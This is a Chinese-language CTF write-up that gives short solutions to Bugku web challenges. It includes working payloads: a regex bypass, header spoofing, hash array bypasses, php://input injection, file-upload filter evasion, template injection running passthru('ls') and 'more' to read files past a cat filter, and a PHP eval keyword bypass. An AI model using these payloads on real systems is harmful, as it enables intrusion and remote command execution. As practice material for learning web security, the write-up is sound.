1.Bugku刷题

字符？正则？

wp
审计代码。

highlight_file('2.php');
$key='flag{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
//preg_match() 执行匹配正则表达式
//trim() 函数移除字符串两侧的空白字符或其他预定义字符
//
if( $IM ){ 
  die('key is: '.$key);
}

①/key.key.{4,7}key:/./(.key)[a-z][[:punct:]]/i
/xxx/i 是PHP或Perl一类的语言中的正则表达式，其中xxx表示真正的正则表达式本身，而后面的i表示ignoreCase，即忽略大小写的意思。
②key.key.{4,7}key:/./(.key)[a-z][[:punct:]]

图来自wp

?id=keyaakeyaaaakey:/a/akeya:

程序员本地网站

要求本地访问，那就改Referer头或X-Forwarded-For头即可。

MD5

1-2

试了一下，a是get参数。既然题目是md5碰撞，那就直接输入一个碰撞值即可。

1-3

各种绕过哟

1-4

绕就完事了，sha1函数不能处理数组。

?id=margin&uname[]=1
passwd[]=2

file_get_contents

看到file_get_contents函数马上联想到php://input伪函数。
构造payload

?ac=flag&fn=php://input
flag

需要管理员

御剑扫一下，扫出robots.txt，访问一下。

1-5

访问/resusl.php。

1-6

?x=admin

文件上传

文件头Content-Type: multipart/form-data中任意将一个字母改大写，文件后缀名改为php4，类型改为对应的image/jpeg。

文件包含2

直接把get参数改为/flag即可。
这道题到底有啥意思是呢？

点login咋没反应

提示在源码中。

1-7

访问，得到源码。

1-8

<?php
$KEY='ctf.bugku.com'; 
echo serialize($KEY)
?>
//s:13:"ctf.bugku.com";

加进cookie里。

1-9

聪明的php

随便传一个参数先。

1-10

看提示，是模板漏洞。尝试一下{7*7}，发现可以运算。

1-11

?file={passthru("ls")}

1-12

1-
可以正常执行，但是根目录下无flag文件，但有一个 _20477文件，打开看看。
此处要注意cat命令被过滤掉了，所以要用其他具有输出功能的命令。

?file={passthru("more /_20477")}
//Linux more 命令类似 cat ，不过会以一页一页的形式显示，更方便使用者逐页阅读。

闪电十六鞭

知识点：可变变量，短标签。
wp
这道题的考查点就是对php代码的审计能力。

    error_reporting(0);
//关闭报错
    require __DIR__.'/flag.php';
    $exam = 'return\''.sha1(time()).'\';';
    if (!isset($_GET['flag'])) {
//flag参数是否设置
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    else if (strlen($_GET['flag']) != strlen($exam)) {
//flag的长度应与$exam相等，为49 
//$exam="return'sha1(time())';"，其中，sha1(time())为哈希加密，结果长度为40，所以 strlen($exam))=49
        echo '长度不允许';
    }
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
//不能出现以上关键词
        echo '关键字不允许';
    }
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
    else {
        echo '马老师发生甚么事了';
    }

    echo '<hr>';

    highlight_file(__FILE__);

构造payload

?flag=$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111
//flag被过滤了，所以要拆开来传入。
//并非是要通过if判断，而是利用eval函数来直接输出变量$flag。
//<? ?>和<?= ?>是短标签而<?php ?>是长标签，其中<?= 是代替 <? echo的，<? ?>代替的是<?php ?>。
//eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码，且必须以分号结尾。
//$$a为可变变量，即$$a=$flag。